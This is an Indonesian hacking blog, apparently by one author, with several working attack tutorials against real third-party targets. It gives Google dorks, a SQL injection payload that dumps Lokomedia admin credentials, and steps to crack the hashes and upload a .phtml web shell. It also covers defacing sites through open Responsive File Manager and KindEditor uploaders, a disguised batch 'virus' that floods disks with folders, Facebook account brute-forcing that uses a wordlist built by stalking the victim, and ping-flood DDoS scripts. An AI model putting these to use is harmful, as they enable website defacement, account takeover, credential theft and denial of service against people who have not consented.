Teman

Diberdayakan oleh Blogger.

Deface Metode SQLi LokoMedia

Baiklah Kali ini saya akan Memberikan tutorial cara deface metode SQLi Lokomedia Pertama kalian siapkan - Laptop/pc yang terhubung...

Formulir Kontak

Nama

Email *

Pesan *

Cari Blog Ini

My Blog List

Chat

Banner 88 x 31

Sosial Media

Deface Metode SQLi LokoMedia





Baiklah Kali ini saya akan Memberikan tutorial cara deface metode SQLi Lokomedia

Pertama kalian siapkan

- Laptop/pc yang terhubung di Internet...hehehe jelas lah :v
- Kopi/Teh Dan Cemilan :v
- Shell yang berekstensi .phtml

Dork Nya :

inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
inurl:statis-1-visimisi.html
inurl:statis-1-tujuan.html



Lalu Kalian Pilih salah satu web yg akan kalian deface,,lalu masukkan exploit nya 

'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Cara Masukin Exploit Nya ===> Contoh: www.sitetarget.com/statis-3(masukkan explot nya disini)-strukturorganisasi.html

Dan Jadinya akan seperti ini



Lalu Kalian Tekan CTRL + U untuk melihat user dan password si target

Maka Jadinya Akan Seperti Ini


Nah Sekarang User Dan Password Si Target Sudah Terlihat..Password Si korban Masih Dalam Bentuk Md5..Jadi,kalian harus decrypt dulu password nya..Cara decrypt nya,kalian menggunakan Hashkiller Atau md5online.org

Link Nya

===>  HashKiller

===> Md5Online


Nah Sekarang Gua dapat Password Nya..Tinggal Kalian Login




Untuk login biasanya di

/redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php

JIKA WEB NYA GAK VULN MAKA KALIAN HARUS CARI WEB LAIN,,HIHIHIHI :v :v :v

Kali ini Gua login Di /adminweb



Jika Login Berhasil,,Maka Hasil Nya Akan Seperti Ini


Setelah Itu Kalian Upload Shell Kalian Yang Berektensi .phtml Di bagian Download

Lalu Kalian Klik Tambah Download,,Lalu Upload Shell Kalian



Karena Saya Gak Nebas Index,,Jadi Saya Hanya Mengupload Script Deface Saya

JAGA WEB INDONESIA BRO,HIHIHI :V :V :V

Jika Selesai Mengupload Shell Kalian,,Maka Kalian Akses Shell Kalian Dengan Cara

Contoh: www.sitetarget.com/files/namashellkalian.phtml

DAN HASIL NYA!!!!!




Masih Kurang Paham??,,Silahkan Lihat Video Nya :





OKE SEKIAN DARI SAYA..JIKA ADA KEKURANGAN MOHON DI MAAFKAN

~Mr. Forbidden404

THANKS

Yuk Jahili Teman Kalian Dengan Virus Shortcut!!




Halo Bro...Yuk kita jahili temen dengan membuat nya histeris,hihihi :v
Udah Tau blelum VIRUS SHORTCUT???

Virus yang satu ini tidak berbahya sama sekali..TETAPI,virus ini sangat menjengkelkan,karena virus ini menyebarkan dan menggandakan dirinya dengan cara menyamar sebagai shortcut program ataupun file yang ada di komputer yg kalian punya..dan kita membuat virus shortcut tersebut sebanyak 10000 biji..Gimana,,Gila kan??10000 biji ndro,hahaha :v..

Dengan ada nya virus shortcut yang berjumlah 10000 biji ini, maka pasti si korban akan panik ataupun menjerit histeris karena ketakutan..virus ini bertujuan untuk menjahili teman kalian dan virus ini tidak memakan memory,,Tetapi memakan banyak tempat wkwkwwkwkwk :v :v

Lalu Bagaimana cara membuat nya?? Simak Langkah-Langkah berikut

1. Buka Notepad lalu copy script di bawah ini

@echo off
:top
md %random%
goto top

2.  Lalu simpan dengan nama yang tidak mencurigakan..Namanya terserah kalian,,asalkan ekstensi file nya harus (.bat)..Misalnya: "virusgila.bat"...Mengapa saya katakan Virus gila,,karena Virus ini cukup gila,hahahah :v :v

3. Setelah itu Ganti icon nya biar gak mencurigakan

4. Nah sekarang si virus gila ini sudah siap di gunakan,,Silahkan kalian sebarkan virus ini ke teman-teman kalian,pak guru,pak satpam atau siapa deh sesuka hati kalian,hihihhi :v :v

- Cara Menyebarkannya:  Tinggal kalian klik virus tersebut 2x,,Maka otomatis virus shortcut akan di buat dan tunggulah proses nya..Jika kalian sudah merasa puas dan sudah merasa banyak sekali,,Kalian tinggal klik Tombol X Pada Aplikasi tersebut yang sedang berjalan...

- Cara Menghapusnya: Kalian Tinggal  Tekan CTRL + A lalu tekan SHIFT + DEL


AYO ISENGIN TEMEN KALIAN :v :v :v

MAAF GAK ADA SCREENSHOT NYA



SEKIAN DARI SAYA

SEMOGA BERMANFAAT

Deface Metode Responsive File Manager




Baiklah..Pada kesempatan Kali ini Saya Akan Share Tutorial Deface Metode Responsive File Manager

Bahan-bahannya:

- Pc/laptop yang terkonek internet(Jelaslah Harus Terkonek Internet :v)
- Cemilan di tambah dengan secangkir kopi atau teh :v
- Muka yang tamvan,hihihi :v

Dork : inurl:/filemanager/ intext:"dialog.php" inurl:/js/filemanager/ intext:"dialog.php" inurl:/assets/filemanager/ intext:"dialog.php"Kembangkan Lagi Dorknya Tamvan :v :v

Exploit ;   /filemanager/dialog.php
Script Deface Kalian. HTML

1. Masukkan salah satu dork di atas ke mesin pencarian yang kalian gunakan

2. Pilih salah satu Target,Lalu Pilih "dialog.php"


3. Setelah itu kalian akan beralih ke Responsive File Manager
    Lalu Kalian cari aja tombol upload di bagian pojok kiri atas



4.  Lalu Kalian klik "or click",,lalu upload script deface kalian




5.  Jika script deface kalian berhasil di upload,,Maka hasil nya akan seperti ini


6.  Untuk memuncul kan script deface nya,kalian kembali ke awal Responsive File Manager nya Dengan Meng-klik "Return To Files List"

7. Lalu Kalian Cari Script deface kalian yang kalian upload tadi,,kalau kalian sudah dapat..Kalian tinggal klik kanan lalu pilih "show URL"..Setelah Itu Kalian Copy URL nya Lalu Paste ke address bar browser kalian.



8. DAN HASIL NYA!!!



SEKIAN DARI SAYA

THANK YOU TAMVAN :V :V

Mengenal Deep Web,Internet Underground



Mengenal Apa itu Deep Web,Internet Underground Dan Cara Akses nya

Seberapa sering Anda menggunakan internet  Setiap hari?Dengan menggunakan internet setiap hari, bukan berarti anda memang sudah mahir dan mengenal seluk beluk dunia internet dengan baik. Mungkin saja kita hanya mengenal bagian “permukaan” internet saja. Sebab dalamnya dunia internet siapa yang tahu?

Berbicara Tentang Internet,,Pada kesempatan ini saya memiliki topik yang sangat menarik untuk di bahas,,Kali ini saya akan membahas tentang DEEP WEB

Bagian dalam dari dunia internet biasa dikenal dengan istilah deep web. Kalau selama ini kita hanya mengenal dunia internet dari kegiatan browsing biasa, maka deep web tidak bisa diakses dengan cara browsing yang biasa kita lakukan. Karena sejatinya deep web menyimpan banyak misteri yang tidak bisa diakses oleh semua orang.

Sebagian orang mungkin belum mengenal apa itu DEEP WEB,,jika Anda menganggap bahwa Deep Web adalah merupakan sebuah nama situs, maka Anda salah besar. Karena sebenarnya Deep Web adalah salah satu bagian dari internet, jika di ilustrasikan maka akan terlihat seperti gambar dibawah ini:

Mungkin Anda Bingung Dengan Gambar Di atas..jadi begini, jika internet digambarkan sebagai sebuah gunung es di tengah lautan, maka konten yang ada di internet yang biasa kita temukan (Google, Facebook, Twitter, situs berita, dll.) adalah puncak dari gunung es tersebut.

Dan bagian gunung yang terendam air laut tersebut disebut dengan Deep Web...Seberapa Besar Anda Menggunakan internet Setiap hari??..Dari 100% konten yang ada di internet yang anda biasa buka(Google,Facebook,Twitter,Dan Sebagainya) Itu Hanya 4%..Dan 96%-Nya Adalah Deep Web.

Apa Saja yang Ada Di Deep Web?

Sebagian besar konten yang ada di deep web berupa database hasil penelitian yang dilakukan oleh lembaga peneliti, pemerintahan maupun penelitian yang bersifat pribadi. Sebagian konten lainnya terdiri dari konten porno, ilegal, konten yang dibuat oleh para hacker, dokumen rahasia pemerintahan serta aneka konten ekstrim lainnya yang tidak dapat dideteksi atau di sensor oleh mesin pencarian biasa.
Bahkan Ada Pula konten-konten ekstrim seperti, eksploitasi anak sebagai obyek seks Penjualan Manusia , Jasa Pembunuh Bayaran, BlackMarket dan jual beli obat-obatan terlarang dan senjata ilegal..Dengan Menemukan Konten-konten tersebut  bukan lah hal yang sulit di temukan di Deep web..Intinya, dunia deep web memang sangat luas dan memuat banyak konten-konten berbahaya.
Apa Benar Deep web Berbahaya??
Deep web memang sangat berbahaya bagi para pengguna di dunia internet biasa. Di dalam Deep web Ada banyak hacker atau pihak-pihak yang bisa mendeteksi keberadaan kita dengan mudah ketika kita memasuki deep web. 
Kalau kita melakukan kecerobohan saat membuka deep web, bukan mustahil para hacker akan mengungkap identitas kita bahkan mencuri informasi yang kita miliki. Deep web memiliki informasi yang lebih besar 400 hingga 500 kali dari web biasa, dengan kapasitas informasi mencapai 7.500 TB. Hampir 95% konten di deep web bisa diakses tanpa registrasi. Melakukan registrasi atau login di deep web hanya akan mempermudah cyber crime yang sedang mengintai kita.

Yang Harus Dilakukan Ketika Membuka Deep Web?

Usahakan untuk tidak mengunduh apapun atau memasukkan informasi apapun pada deep web. Sekedar melihat konten-konten liar di deep web mungkin tidak terlalu masalah, tapi jangan sampai kita terlibat terlalu jauh dalam dunia deep web.
Jangan lupa untuk menghapus setiap history dan cache setelah mengakses deep web sehingga informasi pribadi kita tidak mudah ditelusuri oleh para hacker atau pelaku #cybercrime lainnya. Sebaiknya kita memang tidak mengakses deep web sebab “palung” ini memang terlalu berbahaya untuk diselami. Berselancar di “permukaan internet” sudah cukup memberikan manfaat dan tambahan pengetahuan bagi kehidupan kita.
Jika anda Ingin mengakses deep web,silahkan kalian mendowload TOR WEB BROWSER ==>Disini
Saya Tidak Bertanggung jawab jika ada masalah

Tutorial Hack Fb Dengan Brute Force Attack




Jumpa Lagi Dengan Saya Mr. Forbidden404

Kali ini saya akan memberikan tutorial Hack Akun Fb Dengan Brute Force Attack

Pertama Kalian Harus Siapkan Bahan-bahannya dlu:
-Python [ buat yang pake windows. kalo udah di install ya skip ke langkah berikutnya]
-Mechanize
-Tools BruteForce(Facebook.py)

Download disini Bahan-Bahannya:
-wordlist password nya cari aja di om google,ada buanyak :v

Langkah-Langkah :
1. Install Python 

2. Install Mechanize,Caranya:

-ekstrak file .zip yang sudah kalian download 
-Untuk memudahkan ekstrak saja di dir C:
-Lalu buka CMD , ketik cd/mechanize-0.2.5 (karena tadi ngekstrak file nya di direktori itu) 
-kalo sudah ,kalian  ketik setup.py install . Dan Tunggu proses install selesai.

3  .Jika Proses Install nya sudah selesai,Sekarang  tinggal simpan bahan yang ketiga yaitu tools nya . simpen di Direktori C:/Python27/ dengan nama Facebook.py *formatnya harus .py.

4 .Buka dengan CMD 
lalu ketik
cd/
cd python27

lalu ketik Facebook.py
nah, nanti disuruh masukin email target yang mau di anu anu, tekan enter. lalu disuruh masukin list password yang digunakan untuk Brute Force nya.

NB:List password harus satu folder dengan tools bruteforce nya. Misal ane simpen dengan nama Facebooklist.txt
Tinggal tunggu proses bruteforce selesai.  



Perlu Di Ingat:
salah satu tips kunci sukses dari BruteForce pada teknik ini adalah List password/ Wordlist yg kalian buat ;) *wordlist bisa di download digoogle / bisa bikin sendiri.
kalo target nya adalah orang yang sudah anda tauu, kalian bisa melakukan teknik information gathering *atau bisa dibilang stalker yang lagi gali2 informasi si korban.
masukin aja informasi2 penting ke list target, contoh nomor telpon atau tanggal lahir



Nah Sekarang Password nya ketemu..Tinggal Kalian Login Aja ke Facebook Menggunakan Alamat Email Atau Fbid korban



Dan,,Sekarang Fb dari taregt saya sudah saya kuasai





Jika Kalian Tidak Mendapatkan Password nya..Itu Tergantung Dari Wordlist Password nya

NB: Tutorial Ini Saya Buat Untuk Pembelajaran saja,,Tutorial Ini Hanya di gunakan Apabila Akun FB anda Berpindah tangan kepada orang lain..Dan Mohon Tidak Di Salah Gunakan


SEKIAN DARI SAYA

SEMOGA BERMANFAAT
THANKS TO==>Allah.Swt
                              Mr. Forbidden404
                            Anonymous Cyber Team

Deface Metode Kind Editor Bagi Pemula

Halo guys...kali ini saya akan share "Tutorial Deface Metode Kind Editor" Bagi Pemula

Pertama Kalian harus siapkan:

Laptop/PC yang sudah terkoneksi internet

Dork=>  inurl:examples/uploadbutton.html
               inurl:uploadbutton.html

1. Masukkan salah satu dork tersebut ke mesin pencarian kalian

2.Pilih salah satu web

3.Klik Upload,lalu pilih script deface kalian(.html)..setelah itu tunggu sampai muncul URL hasil Upload-an Kalian..Kalau gak muncul,berarti kalian harus cari web lain

4. Lalu Copy URL nya,dan tarus URL nya di belakang web nya
CONTOH: www.target.com/taruhurlnyadisini..
Lalu tekan ENTER,maka hasil nya akan seperti ini


GIMANA??MUDAH KAN???

SEMOGA BERMANFAAT

DDOS ATTACK dengan menggunakan CMD



Welcome..Kali ini saya share cara melakukan DDOS ATTACK dengan menggunakan CMD

sebelum saya menjelaskan membuat serangan DDOS dengan cmd, saya akan menjelaskan dulu apa itu DOS, apa itu DDOS.

DoS attack: Denial of Service attack
Serangan ini melibatkan satu komputer / koneksi internet untuk (membanjiri) sebuah server dengan paket ICMP/TCP/UDP,tujuan dari serangan ini adalah untuk membuat bandwith server menjadi overload, sehingga server tidak bisa lagi menangani trafik yang masuk dan server akhirnya down.

DDoS attack: Distributed Denial of Service attack
DDoS attack hampir sama dengan Dos tetapi perbedaan dari hasil yang disebabkan olehnya sangat berbeda. Serangan DDoS dijalankan menggunakan metode computer yang terdistribusi yang sering disebut dengan 'botnet army', atau biasa juga dikenali dengan komputer "zombie". Proses nya dengan cara menginfeksi komputer lain dengan malware yang memberikan akses bagi botnet owner kepada komputer yang terinfeksi. Hal ini bisa berarti, bootnet owner bisa menggunakan resource apa saja dari komputer korban dan menggunakan koneksi komputer tersebut untuk membanjiri (flood) target yang akan diserang. Server yang diserang akan lumpuh sangat cepat karena beberapa koneksi digunakan untuk melawan satu koneksi. Bayangkan ini seperti perkelahian. jika 1 lawan 1 maka kemungkinan menangnya 50:50, tapi jika 1000 lawan 1 ? matilah kita.

Sebetulnya banyak software untuk men-generate serangan DOS, tapi kali ini saya akan mencoba men-generate serangan DOS melalui cmd windows.

cara yang pertama :
ketikan command berikut pada cmd :
1. Buka CMD
2. ketik "ping <ip add>  -l 50000 -n 5000 -w 0.00001"
<ip add> = IP Address situs yang akan di DDoS (bisa diganti dengan alamat situsnya)
-l 50000 = besar ping yang dikirim server sebesar 50000 bytes (bisa diganti maksimal 65500 bytes)
-n 5000 = ukuran buffer yang dikirim 5000 bytes (bisa diganti sesuka hati)
-w 0.00001 = waktu tunggu tiap ping 0.00001 milidetik (bisa diganti sesuka hati)
3. Tekan enter dan tunggu hingga anda mendapatkan pesan "Request timed out"

cara yang kedua :
1. Buka Notepad (accesoris -> notepad)

2. Copy script dibawah ini ke notepad

@echo off
mode 67,16
title DDOS-ATTACK By Mr. Forbidden404
color 0b
cls
echo            ___________________________________________
echo                [ DDOS-ATTACK BY MR. FORBIDDEN404 ]
echo            ___________________________________________
echo             _____________________________________________
echo             * Name : DDOS Attacking Server  
echo             * Author  By: Mr. Forbidden404          
echo             * Visit My Blog : Mr-Forbidden404.blogspot.com
echo             ______________________________________________
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo                __________________________________
echo                  *  Masukan URL / IP Target  *
echo                __________________________________
echo.
set /p m=website [URL/IP]:
echo.
set /p n=Jumlah data yang akan di kirim:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

 3. Kemudian Save Menggunakan Extensi .Bat (contohDDoS.bat)

4. setelah itu buka file yang telah kita buat tadi

5. Server-target isikan dengan nama domain / nama situs yang akan kita DDOS. misal : www.google.com

6. Setelah kita isikan server-target maka akan muncul alamat ip target, lalu pada ip host isikan ip address target kita

7. Lalu akan ada packet size, isikan terserah anda.
misalkan 1000000000

8. Setelah itu tekan enter maka proses DDOS akan berjalan, DDOS membutuhkan waktu yang lumayan lama tergantung kemampuan situs yang kita DDOS. Akan lebih baik kalau kita melakukan DDOS secara serentak atau dengan banyak orang.

INGAT !!! Ini hanya sekedar pembelajaran saja..Jangan di salah gunakan,jangan di coba ke website orang lain,apalagi website resmi...

SEMOGA BERMANFAAT